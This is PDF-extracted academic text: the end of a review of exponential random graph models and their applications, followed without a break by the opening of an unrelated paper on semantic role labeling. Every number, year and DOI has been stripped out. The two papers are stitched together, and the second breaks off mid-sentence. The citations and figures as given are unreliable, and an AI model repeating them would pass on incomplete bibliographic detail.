eq. ( ), xij is the probability of presence of an edge between nodes i and j. xc is also the state of all other edges in the time predicting xij. five datasets have been used: ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • sina microblog dataset community of ‘‘beijing badminton community.’’ • sina microblog dataset community of ‘‘beijing bicycle community.’’ • sina microblog dataset community of ‘‘data mining community.’’ • scientist co-authorship dataset gr (general category). the authors of krause & caimo ( ) have presented a new estimation algorithm for bayesian exponential random multi-graphs model which is an imputation model applicable to such multi-layer networks. this work is an extension of the koskinen, robins & pattison ( ) to multi-layer networks. an interested reader can refer to a recent survey on different imputation method on network missing data (krause et al., ). one of the advantages of this methods is that it is solely about missing data in the context of networks. different missing data treatment methods have been tested on different missing data in a complete benchmarking framework. scientific collaboration finding the best colleagues or best-related research papers and topics is always a significant issue for anyone in the scientific community. co-author and citation networks analyses are two important topics that have been extensively studied in research related to analysis of networks addressing these issues. the researchers in zhang et al. ( a) addressed the effect of three major network properties in scientific collaboration networks including homophily, transitivity, and preferential attachment. performing an ergm study on these networks, they argued that incorporating the mentioned properties we can provide more insight into how collaborations form. the data for this study were collected using the metadata of papers’ citations from the web of science from to . as we approach more complex scientific phenomena, we more feel the need for collaboration between different scientific communities. fagan et al. ( ) also studied a co-authorship network to evaluate the changes in inter-disciplinary scientific articles. more precisely, they applied a special form of ergms called the separable temporal ergms (stergm) krivitsky & handcock ( ) to evaluate the co-authorship network over time and make prediction ties in the network. they employed some structural and nodal attributes. structural attributes refer to a number of edges, degree, and triadic closure, while some nodal attributes capture whether two individuals have the same professor rank, gender, and college. ergms are widely used for citation networks analysis. an & ding ( ) performed the same study in the special case of publications on causal inference. they argued that some technical and social processes are underpinning citation networks. their ultimate goal was to explain the essential factors in forming a citation network and predicting the citation patterns. an in-depth study of polarization among researchers of the field of social science was performed in a recent work (leifeld, ). he used both qualitative and quantitative methods to address the most compelling reasons and strategies causing the polarization. ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. he applied ergm as his qualitative method over two co-authorship networks in the field of social science in two separate countries. other than the studies on co-authorships and citation networks there are other aspects of scientific collaboration that have been widely studied. one of such studies is the study on how the recruitment of new members of scientific collaborators in scientific organizations takes place. in a study (leifeld & fisher, ) the dynamics underlying the membership procedure of new scientist in international scientific assessments has been evaluated. the authors have used a dataset extracted from an international well-known research program on world’s ecosystem called millennium ecosystem assessment (ma). their method is based on analyzing the pattern of the network formation by ergm using a number of exogenous and endogenous network’s statistics. the analysis approved the authors hypothesis which suggests that factors like having the same nationality to the previous researcher in the research group or being in the same institution with them have a high impact on the recruitment of new researchers. this could result in lack of diversity of opinions in the final outcomes of the assessments conducted by the research group. wireless networks modelling random geometric graphs also known as rggs are defined as the group of graphs which are obtained by placing a number of nodes randomly in a geometrical space and draw vertices between those nodes which their distance is less than a threshold d in a given norm (penrose et al., ). one issue in the wireless sensor networks is that there is not a fixed placement for the nodes in most of times. the nodes are randomly distributed and therefore the shape of connecting graph tend to be very volatile (raghavendra, sivalingam & znati, ). studying these graphs formation and the statistical dynamic behind their formation has been extensively investigated in the literature related to rggs (iyer & manjunath, ). for example, exponential rggs which are the rggs that the distribution of their nodes is also exponential (gupta, iyer & manjunath, ). these graphs have been used for modeling wireless sensor networks shang ( ) abd kenniche & ravelomananana ( ). in the shang ( ) the wireless sensors are assumed to be on a line and to evolve over time with respect to a dynamic rgg process. the effect of statistical properties for a particular time snapshot has also been considered in this paper. such analysis with using one-dimensional rgg has also been done in the past in karamchandani et al. ( ). vehicular ad hoc network are yet another use case for rggs (zhang et al., ). due to the movement of the vehicles and the rapid changes in the graph they have many similarities to previous applications of rggs. other applications the applications of ergms are so extensive that some works cannot be organized in a particular category. in this section, we introduce some of them. the concept of social networks is not limited only to human relationships. there are some complex interactions in animal behaviors which can be modeled as graphs. ergms are also a useful tool for analyzing these kinds of networks. in a recent work, (silk & fisher, ) reviewed the use of ergms in such studies. also, more specifically, other recent ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. works have leveraged ergms capabilities in their specific context. hellmann & hamilton ( ) is a work in which the authors investigated the effect of neighbors’ mediation in cooperative fish breeding by analyzing their interactions with an ergm model. in another work (silk et al., ), the same approach was used to investigate sex-related disease spreading through animal contact networks in three sorts of animal networks. in a novel work, müller, grund & koskinen ( ) studied the social inequalities in sweden by analyzing an immigrant movement flow network on both the micro and macro levels. their network was a directed binary graph with stockholm’s neighborhoods as the nodes and ties as the representative of the movement flow across neighborhoods. only structural features (statistics) were used in ergms. how do networks respond to a sudden change? which sort of disruptions is most influential in the network upcoming status? how the network will react to a change or what is the best reaction? these are all questions that can be summarized as ‘‘forecasting social network reaction to disruption.’’ in a recent article, mellon & evans ( ) reviewed state-of-the-art research articles concerning these topics in various fields. according to them and by mentioning one of their previous works (mellon, yoder & evans, ), ergms can play a crucial role in this issue. in the mentioned work, they used ergms to examine the network formation mechanism before and after the intervention. according to their findings, networks tend to preserve these mechanisms following the disruptions. tools and libraries there are a number of useful tools and libraries that facilitate use of ergms in different domains. pnet and its extension for multilevel networks (mpnet) and bivariate analysis (xpnet) were introduced by wang, robins & pattison ( ). it is a stand-alone software, it has both windows .net and java versions. because of the java version, it can be considered as a cross-platform application. also, since it is not a library of some other languages and thanks to its user-friendly environment, it is the most suitable choice for people with less computer programming background. it is also a free software application and can easily be downloaded through its website (http://www.melnet.org.au/pnet/). statnet (handcock et al., ; handcock et al., ) is an r language package which can implement most state-of-the-art ergm methods and algorithms. it also has a variety of capabilities via other r libraries. for example, some visualization options are available through libraries such as dynamic network and rsonia. a wide range of network configurations has been implemented in this package. it has an active community, and it seems that it is the de facto standard library for ergms. thanks to its open source and well- documented codebase, it can be used as a template for implementation of new methods. however, because it is a programming language library and not standalone software, it requires minimum knowledge of programming. goodreau et al. ( ) have presented a detailed explanation for its installation and usage. there are also other extensions for the statnet; for example, caimo & friel ( ) has incorporated the bayesian ergms into the library. ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.melnet.org.au/pnet/ http://dx.doi.org/ . /peerj-cs. conclusions this study offered an explanation of exponential random graph models aka ergms. we also reviewed some state-of-the-art methods published after . these articles either presented new methods for fitting the ergms parameters or studied the possibility of using new network configurations. further, we did a comprehensive study of the research articles published by scientists of multiple disciplines which have leveraged the applications of ergms in their fields of interest. multiple variation of the ergm networks have been reviewed. we classified research articles in seven plus one (other applications) categories. these included research works in medical imaging, healthcare applications, economics and management, political science, missing data and link prediction, scientific collaboration, wireless networks modelling, and other applications. altogether, these studies provided valuable insight into the potential use of ergms in interdisciplinary research. we also presented a brief description of the ergms tools and libraries which can be used by scientists to conduct research like the research papers we presented. the objective of this study was to develop an understanding of the ergms methods and applications for those with limited knowledge about them. however, more in depth study for applications of ergms in each special area of study is still needed. these domain specific studies can do further analysis on the technical side of the ergm modelling which was not a concern of our work. some potential future directions for future research are: • there are many good papers investigated the applications of exponential random graphs from social science research community. however, there is a lack of interest among engineering community in these methods. investigating the possibilities of using ergms in networked data in various field of engineering studies is a research path should be considered in the future. some examples are studies on computer network topology, internet measurement which this statistical tool might be used for prediction of missing links or for the purpose of data, etc. • multilayer networks are now widely studied in different disciplines e.g., transport and economical networks. despite some good works using state of the art ergms methods for multi-layer networks there is still a lack of interest in using statistical tools like ergms for them comparing to other methods. • the hype of deep learning (lecun, bengio & hinton, ) has made many new possibilists for combining them with traditional methods to achieve better estimation. to the best of our knowledge no work has been done to this date trying to leverage graph based deep learning methods alongside ergms. • despite the existence of comprehensive libraries for ergms like statnet, there is still no library for it written in python. since python is the most used programming language in data science it is worthwhile to implement a powerful library for ergms modelling in python. one possible way is to extend current widely used libraries like networkx (hagberg, swart & chult, ) to include ergms in them. • to the best of our knowledge there is no comprehensive research on comparison of ergms with newly presented generative graph models like netgan (bojchevski et al., ). ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • saeid ghafouri conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, and approved the final draft. • seyed hossein khasteh analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: our paper is a review paper and there is no code or raw data associated with it. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references amati v, lomi a, mira a. . social network modeling. annual review of statistics and its application : – doi . /annurev-statistics- - . an w, ding y. . the landscape of causal inference: perspective from citation network analysis. the american statistician : – doi . / . . . anderson cj, wasserman s, crouch b. . a p* primer: logit models for social networks. social networks : – doi . /s - ( ) - . baggio s, luisier v, vladescu c. . relationships between social networks and mental health: an exponential random graph model approach among romanian adolescents. swiss journal of psychology ( ): . becker kr, stojek mm, clifton a, miller jd. . disordered eating in college sorority women: a social network analysis of a subset of members from a single sorority chapter. appetite. bianchi f, casnici n, squazzoni f. . solidarity as a byproduct of professional collaboration: social support and trust in a coworking space. social networks : – doi . /j.socnet. . . . block p, koskinen j, hollway j, steglich c, stadtfeld c. . change we can believe in: comparing longitudinal network models on consistency, interpretability and predictive power. social networks : – doi . /j.socnet. . . . ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /annurev-statistics- - http://dx.doi.org/ . / . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /peerj-cs. bojchevski a, shchur o, zügner d, günnemann s. . netgan: generating graphs via random walks. arxiv preprint. arxiv: . . bouranis l, friel n, maire f. . efficient bayesian inference for exponential random graph models by correcting the pseudo-posterior distribution. social networks : – doi . /j.socnet. . . . bouranis l, friel n, maire f. . bayesian model selection for exponential random graph models via adjusted pseudolikelihoods. journal of computational and graphi- cal statistics – . byshkin m, stivala a, mira a, krause r, robins g, lomi a. . auxiliary param- eter mcmc for exponential random graph models. journal of statistical physics : – doi . /s - - - . caimo a, friel n. . bayesian inference for exponential random graph models. social networks : – doi . /j.socnet. . . . caimo a, friel n. . bergm: bayesian exponential random graphs in r. arxiv preprint. arxiv: . . caimo a, friel n. . bergm: bayesian exponential random graphs in r. journal of statistical software : – . caimo a, pallotti f, lomi a. . bayesian exponential random graph modelling of interhospital patient referral networks. statistics in medicine : – doi . /sim. . campbell bw, marrs fw, böhmelt t, fosdick bk, cranmer sj. . latent in- fluence networks in global environmental politics. plos one :e doi . /journal.pone. . chatterjee s. . an introduction to large deviations for random graphs. bulletin of the american mathematical society : – doi . /bull/ . chatterjee s, diaconis p. . estimating and understanding exponential random graph models. the annals of statistics : – doi . / -aos . chen thy. . statistical inference for multilayer networks in political science. political science research and methods – . coleman js. . relational analysis: the study of social organizations with survey methods. human organization : – doi . /humo. . .q m q n . de la haye k, embree j, punkay m, espelage dl, tucker js, green jr hd. . analytic strategies for longitudinal networks with missing data. social networks : – doi . /j.socnet. . . . dellitalia j, johnson ma, vespa pm, monti mm. . network analysis in disorders of consciousness: four problems and one proposed solution (exponential random graph models). frontiers in neurology : – doi . /fneur. . . desmarais ba, cranmer sj. . statistical inference for valued-edge networks: the generalized exponential random graph model. plos one :e doi . /journal.pone. . ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://arxiv.org/abs/ . http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.socnet. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /sim. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /bull/ http://dx.doi.org/ . / -aos http://dx.doi.org/ . /humo. . .q m q n http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /fneur. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. duxbury sw, haynie dl. . building them up, breaking them down: topology, vendor selection patterns, and a digital drug market’s robustness to disruption. social networks : – doi . /j.socnet. . . . erdös p, rényi a. . on random graphs i. publicationes mathematicae (debrecen) : – . fagan j, eddens ks, dolly j, vanderford nl, weiss h, levens js. research collabora- tion, xx. . assessing through co-authorship network analysis. journal of research administration : – . fienberg se. . introduction to papers on the modeling and analysis of network data. the annals of applied statistics : – . frank o. . a survey of statistical methods for graph analysis. sociological methodol- ogy : – doi . / . frank o, strauss d. . markov graphs. journal of the american statistical association : – doi . / . . . gallemore c, jespersen k. . transnational markets for sustainable development governance: the case of redd+. world development : – doi . /j.worlddev. . . . geyer cj, thompson ea. . constrained monte carlo maximum likelihood for dependent data. journal of the royal statistical society. series b (methodological) : – . goldenberg a, zheng ax, fienberg se, airoldi em. . a survey of statistical network models. foundations and trends r©in machine learning : – . goodman la. . snowball sampling. the annals of mathematical statistics : – . goodreau sm. . advances in exponential random graph (p*) models applied to a large social network. social networks : – doi . /j.socnet. . . . goodreau sm, handcock ms, hunter dr, butts ct, morris m. . a statnet tutorial. journal of statistical software ( ): . gupta b, iyer sk, manjunath d. . topological properties of the one dimensional exponential random geometric graph. random structures & algorithms : – doi . /rsa. . hagberg a, swart p, chult ds. . exploring network structure, dynamics, and function using networkx. los alamos: los alamos national lab.(lanl). hamilton m, lubell m. . collaborative governance of climate change adapta- tion across spatial and institutional scales. policy studies journal : – doi . /psj. . handcock ms, hunter dr, butts ct, goodreau sm, morris m. . statnet: software tools for the statistical modeling of network data. seattle. available at http:// statnetproject.org. handcock ms, hunter dr, butts ct, goodreau sm, morris m. . statnet: software tools for the representation, visualization, analysis and simulation of network data. journal of statistical software : . ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . / http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.worlddev. . . http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /rsa. http://dx.doi.org/ . /psj. http://statnetproject.org http://statnetproject.org http://dx.doi.org/ . /peerj-cs. handcock ms, jones jh. . likelihood-based inference for stochastic mod- els of sexual network formation. theoretical population biology : – doi . /j.tpb. . . . hanneke s, fu w, xing ep. . discrete temporal models of social networks. electronic journal of statistics : – doi . / -ejs . hellmann jk, hamilton im. . intragroup social dynamics vary with the presence of neighbors in a cooperatively breeding fish. current zoology ( ): – . holland pw, leinhardt s. . a dynamic model for social networks. journal of mathematical sociology : – doi . / x. . . hunter dr. . curved exponential family models for social networks. social networks : – doi . /j.socnet. . . . hunter dr, handcock ms, butts ct, goodreau sm, morris m. . ergm: a package to fit, simulate and diagnose exponential-family models for networks. journal of statistical software ( ):nihpa . iyer sk, manjunath d. . topological properties of random wireless networks. sadhana : – doi . /bf . karamchandani n, manjunath d, yogeshwaran d, iyer sk. . evolving random ge- ometric graph models for mobile wireless networks. in: th international symposium on modeling and optimization in mobile, ad hoc and wireless networks. – . kenniche h, ravelomananana v. . random geometric graphs as model of wireless sensor networks. in: the nd international conference on computer and automa- tion engineering (iccae). – . koskinen jh, robins gl, pattison pe. . analysing exponential random graph (p-star) models with missing data using bayesian data augmentation. statistical methodology : – doi . /j.stamet. . . . koskinen jh, robins gl, wang p, pattison pe. . bayesian analysis for partially ob- served network data, missing ties, attributes and actors. social networks : – doi . /j.socnet. . . . koskinen jh, snijders tab. . bayesian inference for dynamic social network data. journal of statistical planning and inference : – doi . /j.jspi. . . . krause rw, caimo a. . missing data augmentation for bayesian exponential random multi-graph models. in: international workshop on complex networks. – . krause rw, huisman m, steglich c, sniiders tab. . missing network data a comparison of different imputation methods. in: . ieee/acm international conference on advances in social networks analysis and mining (asonam). – . krivitsky pn. . exponential-family random graph models for valued networks. electronic journal of statistics : – doi . / -ejs . krivitsky pn, handcock ms. . a separable model for dynamic networks. jour- nal of the royal statistical society: series b (statistical methodology) : – doi . /rssb. . lecun y, bengio y, hinton g. . deep learning. nature : – . ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.tpb. . . http://dx.doi.org/ . / -ejs http://dx.doi.org/ . / x. . http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /j.stamet. . . http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /j.jspi. . . http://dx.doi.org/ . / -ejs http://dx.doi.org/ . /rssb. http://dx.doi.org/ . /peerj-cs. leifeld p, cranmer sj, desmarais ba. . temporal exponential random graph models with btergm: estimation and bootstrap confidence intervals. journal of statistical software ( ): – . leifeld p, fisher dr. . membership nominations in international scientific assess- ments. nature climate change : – . leifeld p. . polarization in the social sciences: assortative mixing in social science collaboration networks is resilient to interventions. physica a: statistical mechanics and its applications : – doi . /j.physa. . . . li w, bradshaw ae, clary cb, cranmer sj. . a three-degree horizon of peace in the military alliance network. science advances :e . lozano s, gutiérrez e. . a complex network analysis of global tourism flows. international journal of tourism research ( ): – . lusher d, koskinen j, robins g. . exponential random graph models for social networks: theory, methods, and applications. new york: cambridge university press. marrs fw, campbell bw, fosdick bk, cranmer sj, böhmelt t. . inferring influence networks from longitudinal bipartite relational data. arxiv preprint. arxiv: . . mellon j, evans d. . forecasting social network reaction to disruption: current practices and new directions. elsevier. mellon j, yoder j, evans d. . undermining and strengthening social networks through network modification. scientific reports : doi . /srep . metropolis n, rosenbluth aw, rosenbluth mn, teller ah, teller e. . equation of state calculations by fast computing machines. the journal of chemical physics : – doi . / . . morris m, handcock ms, hunter dr. . specification of exponential-family random graph models: terms and computational aspects. journal of statistical software ( ): . müller ts, grund tu, koskinen jh. . residential segregation and ‘ethnic flight’vs.‘ethnic avoidance’in sweden. european sociological review : – doi . /esr/jcy . osei a. . like father, like son? power and influence across two gnassingbé presiden- cies in togo. democratization : – . pan z. . varieties of intergovernmental organization memberships and structural effects in the world trade network. advances in complex systems : . pattison p, wasserman s. . logit models and logistic regressions for social net- works: ii. multivariate relations. british journal of mathematical and statistical psychology : – doi . / . penrose m. . random geometric graphs. oxford: oxford university press. ra fisher ma. . on the mathematical foundations of theoretical statistics. philo- sophical transactions of the royal society of london series a, containing papers of a mathematical or physical character : – doi . /rsta. . . raghavendra cs, sivalingam km, znati t. . wireless sensor networks. springer netherlands: springer. ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.physa. . . http://arxiv.org/abs/ . http://dx.doi.org/ . /srep http://dx.doi.org/ . / . http://dx.doi.org/ . /esr/jcy http://dx.doi.org/ . / http://dx.doi.org/ . /rsta. . http://dx.doi.org/ . /peerj-cs. robins g, pattison p, kalish y, lusher d. a. an introduction to exponential random graph (p*) models for social networks. social networks : – doi . /j.socnet. . . . robins g, pattison p, wasserman s. . logit models and logistic regres- sions for social networks: iii. valued relations. psychometrika : – doi . /bf . robins g, snijders t, wang p, handcock m, pattison p. b. recent developments in exponential random graph (p*) models for social networks. social networks : – doi . /j.socnet. . . . schmid cs, desmarais ba. . exponential random graph models with big networks: maximum pseudolikelihood estimation and the parametric bootstrap. in: big data (big data), ieee international conference on. ieee, – . scott ta, thomas cw. . winners and losers in the ecology of games: network po- sition, connectivity, and the benefits of collaborative governance regimes. journal of public administration research and theory : – doi . /jopart/mux . shang y. . exponential random geometric graph process models for mobile wireless networks. in: international conference on cyber-enabled distributed computing and knowledge discovery. – . silk mj, croft dp, delahay rj, hodgson dj, weber n, boots m, mcdonald ra. . the application of statistical network models in disease research. methods in ecology and evolution : – doi . / - x. . silk mj, fisher dn. . understanding animal social structure: exponential random graph models in animal behaviour research. animal behaviour : – doi . /j.anbehav. . . . silk mj, weber nl, steward lc, hodgson dj, boots m, croft dp, delahay rj, mcdonald ra. . contact networks structured by sex underpin sex-specific epidemiology of infection. ecology letters : – doi . /ele. . simpson sl, hayasaka s, laurienti pj. . exponential random graph modeling for complex brain networks. plos one :e doi . /journal.pone. . simpson sl, moussa mn, laurienti pj. . an exponential random graph modeling approach to creating group-based representative whole-brain connectivity networks. neuroimage : – doi . /j.neuroimage. . . . sinke mrt, dijkhuizen rm, caimo a, stam cj, otte wm. . bayesian exponential random graph modeling of whole-brain structural networks across lifespan. neuroimage : – doi . /j.neuroimage. . . . smith ja. . macrostructure from microstructure: generating whole systems from ego networks. sociological methodology : – doi . / . snijders tab. . stochastic actor-oriented models for network change. journal of mathematical sociology : – doi . / x. . . snijders tab. . markov chain monte carlo estimation of exponential random graph models. journal of social structure : – . ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /bf http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /jopart/mux http://dx.doi.org/ . / - x. http://dx.doi.org/ . /j.anbehav. . . http://dx.doi.org/ . /ele. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . / http://dx.doi.org/ . / x. . http://dx.doi.org/ . /peerj-cs. snijders tab, pattison pe, robins gl, handcock ms. . new specifications for exponential random graph models. sociological methodology : – doi . /j. - . . .x. solo v, poline j-b, lindquist ma, simpson sl, bowman fd, chung mk, cassidy b. . connectivity in fmri: blind spots and breakthroughs. ieee transactions on medical imaging : – doi . /tmi. . . song h, cho j, benefield ga. . the dynamics of message selection in online political discussion forums: self-segregation or diverse exposure? communication research : . stauffer j, pedraza martinez a, yan ll, van wassenhove ln. . asset supply networks in humanitarian operations: a combined empirical-simulation approach. journal of operations management. stivala ad, koskinen jh, rolls da, wang p, robins gl. . snowball sampling for estimating exponential random graph models for large networks. social networks : – doi . /j.socnet. . . . thiemichen s, kauermann g. . stable exponential random graph models with non-parametric components for large dense networks. social networks : – doi . /j.socnet. . . . thurner pw, schmid cs, cranmer sj, kauermann g. . network interdependencies and the evolution of the international arms trade. journal of conflict resolution : – doi . / . ulibarri n, scott ta. . linking network structure to collaborative governance. journal of public administration research and theory : – . van der pol j. . introduction to network modeling using exponential random graph models (ergm): theory and an application using r-project. computational economics : – . wang p, robins g, pattison p, lazega e. . exponential random graph models for multilevel networks. social networks : – doi . /j.socnet. . . . wang p, robins g, pattison p. . pnet: a program for the simulation and estimation of exponential random graph models. melbourne: university of melbourne. williams nl, hristov d. . an examination of dmo network identity us- ing exponential random graph models. tourism management : – doi . /j.tourman. . . . wilson jd, denny mj, bhamidi s, cranmer sj, desmarais ba. . stochastic weighted graphs: flexible model specification and simulation. social networks : – doi . /j.socnet. . . . windzio m. . the network of global migration – : using ergms to test theories of migration between countries. social networks : – doi . /j.socnet. . . . you j, ying r, ren x, hamilton w, leskovec j. . graphrnn: generating realistic graphs with deep auto-regressive models. in: international conference on machine learning. – . ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /tmi. . http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . / http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /j.tourman. . . http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /j.socnet. . . http://dx.doi.org/ . /peerj-cs. zhang c, bu y, ding y, xu j. a. understanding scientific collaboration: homophily, transitivity, and preferential attachment. journal of the association for information science and technology : – doi . /asi. . zhang c, zhai by, wu m. . link prediction of community in microblog based on exponential random graph model. in: wireless personal multimedia communications (wpmc), th international symposium on. ieee, – . zhang s, de la haye k, ji m, an r. b. applications of social network analysis to obesity: a systematic review. obesity reviews : – doi . /obr. . zhang y, zhang h, sun w, pan c. . connectivity analysis for vehicular ad hoc network based on the exponential random geometric graphs. – . ghafouri and khasteh ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /asi. http://dx.doi.org/ . /obr. http://dx.doi.org/ . /peerj-cs. syntax-aware semantic role labeling without parsing rui cai and mirella lapata institute for language, cognition and computation school of informatics, university of edinburgh crichton street, edinburgh eh ab rui.cai@ed.ac.uk mlap@inf.ed.ac.uk abstract in this paper we focus on learning dependency aware representations for semantic role label- ing without recourse to an external parser. the backbone of our model is an lstm- based semantic role labeler jointly trained with two auxiliary tasks: predicting the dependency label of a word and whether there exists an arc linking it to the predicate. the auxiliary tasks provide syntactic information that is specific to semantic role labeling and are learned from training data (dependency annotations) with- out relying on existing dependency parsers, which can be noisy (e.g., on out-of-domain data or infrequent constructions). experimen- tal results on the conll- benchmark dataset show that our model outperforms the state of the art in english, and consistently improves performance in other languages, including chinese, german, and spanish. introduction semantic role labeling (srl) aims to identify the arguments of semantic predicates in a sen- tence and label them with a set of predefined relations (e.g., ‘‘who’’ did ‘‘what’’ to ‘‘whom,’’ ‘‘when,’’ and ‘‘where’’). semantic roles capture basic predicate-argument structure while abstract- ing over surface syntactic configurations and have been shown to benefit a wide spectrum of applications ranging from machine translation (aziz et al., ; marcheggiani et al., ) to information extraction (christensen et al., ) and summarization (khan et al., ). the successful application of neural networks to a variety of nlp tasks (bahdanau et al., ; vinyals et al., ) has provided strong impetus to develop deep end-to-end models for srl that forego the need for extensive feature engineering. recently proposed models (zhou and xu, ; he et al., ; marcheggiani et al., ) largely rely on bi-directional recurrent neural networks (hochreiter and schmidhuber, ) and predict semantic roles from textual input. they achieve competitive results while being syntax agnostic, thereby challenging conventional wisdom that parse trees provide a better form of representation for assigning semantic role labels (johansson and nugues, ). there are, however, good reasons why syntax ought to help semantic role labeling. first and foremost, srl systems are trained on datasets whose semantic role annotations have been pro- duced on top of treebanked corpora, and as a re- sult are closely tied to syntactic information. an example sentence with roles labeled in the style of propbank (palmer et al., ) is shown in figure . here, many arcs in the syntactic depen- dency graph are mirrored in the semantic dependency graph, suggesting that syntactic dependencies could provide useful information to the srl task. secondly, predicates are typically associated with a standard linking, that is, a deterministic mapping from syntactic roles to semantic ones (lang and lapata, ; surdeanu et al., ). for example, subject (sbj) is commonly mapped onto a , whereas a is often realized as object (obj). even in cases where there is no canoni- cal mapping, dependency labels are still closely related to certain semantic roles, like the syntactic function tmp and the semantic role am-tmp. the question of how to effectively incorporate syntactic information into sequential neural net- work models has met with different answers in the literature. marcheggiani and titov ( ) make use of graph convolutional networks (gcns; duvenaud et al., ; kearnes et al., ; kipf and welling, ) as a means to represent syn- tax in neural models. gcns are used to encode syntactic dependency trees in combination with encoders based on long short-term memory units transactions of the association for computational linguistics, vol. , pp. – , . action editor: alessandro moschitti. submission batch: / ; revision batch: / ; published / . c© association for computational linguistics. distributed under a cc-by . license. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april figure : example sentence from the conll- english dataset annotated with syntactic dependencies (bottom) and semantic roles (top). (lstms). he et al. ( ) emphasize the role of syntax in argument identification rather than role labeling. specifically, they develop an argument pruning algorithm that operates over dependency structures and selects argument candidates subject to a parameter determining their distance from the predicate. the predicate and its arguments are then encoded with an lstm similar to marcheggiani and titov ( ). he et al. ( ) incorporate syntax at decoding time, in the form of constraints on the output structure (e.g., consistency with a parse tree is enforced by rejecting or penalizing arguments that are not constituents), whereas strubell et al. ( ) incorporate syntactic infor- mation in a multi-task neural network model that simultaneously performs part-of-speech tagging, dependency parsing, predicate detection, and srl. in this paper we argue that syntactic information is important for semantic role labeling and syn- tactic parsing is not. despite recent advances in dependency parsing (dozat and manning, ; kiperwasser and goldberg, ), the use of an external parser often leads to pipeline-style architectures where errors propagate to later processing stages, affecting model performance. to mitigate such errors, marcheggiani and titov ( ) calculate a scalar gate for each edge in the dependency tree. and perhaps unsurprisingly, the performance of their system decreases when more than one gcn layer is stacked, as the effect of noisy information is amplified. our key insight is to focus on dependency labels, which provide important information for semantic roles without requiring access to a full-blown syntactic representation of the sentence. our model concentrates on the dependency structures pertaining to the predicate in a given sentence rather than capturing information relating to every arc in the dependency tree. the majority of arguments (approximately %) in the conll- english development set are directly linked to the predicate or are predicates themselves. our work focuses on learning dependency- aware representations without recourse to an ex- ternal parser. the backbone of our model is a semantic role labeler jointly trained with a de- pendency information extractor with two aux- iliary tasks: predicting the dependency label of a word and whether there exists an arc linking it to the predicate. the two auxiliary tasks pro- vide dependency information that is specific to the srl task and is learned from training data (dependency annotations) without ever utilizing an external parser. our model falls under the gen- eral paradigm of multi-task learning (caruana, ) which aims to improve a main task by jointly learning one or more related auxiliary tasks. multi-task learning has been successfully applied to various sequence-prediction tasks including chunking, tagging (collobert et al., b; bjerva et al., ; plank, ; søgaard and goldberg, ; hashimoto et al., ), name error detec- tion (cheng et al., ), machine translation (luong et al., ), supersense tagging (bingel and søgaard, ), entailment (hashimoto et al., ), and semantic role labeling (collobert et al., b; strubell et al., ). experimental results on the conll- benchmark dataset show that our model is able to outperform the state of the art in english, and to improve srl performance in other languages, including chinese, german, and spanish. model description most supervised semantic role labeling systems adopt an architecture consisting of the following steps: (a) predicate identification and disambigua- tion (e.g., crowds in figure is a predicate with sense crowd. ); (b) argument identification (e.g., the arguments of the predicate crowds in figure are he and plate); and (c) argument classification (e.g., the semantic roles for he and plate are a and a , respectively). in this paper we focus solely on identifying arguments and labeling them with semantic roles using an off- the-shelf disambiguation model for the first step (björkelund et al., ; roth and lapata, ). our semantic role labeler is built on top of the syntax-agnostic model of marcheggiani et al. downloaded from http://www.mitpressjournals.org/doi/pdf/ . /tacl_a_ by carnegie mellon university user on april ( ), which achieves good performance on the conll- english dataset without making use of a parser. figure provides a schematic overview of our model, which has two main components, namely, a dependency information extractor, and a semantic role predictor. the aim of the dependency extractor is to learn syntactic information for each word which subsequently serves as input (combined with word representa- tions) to the 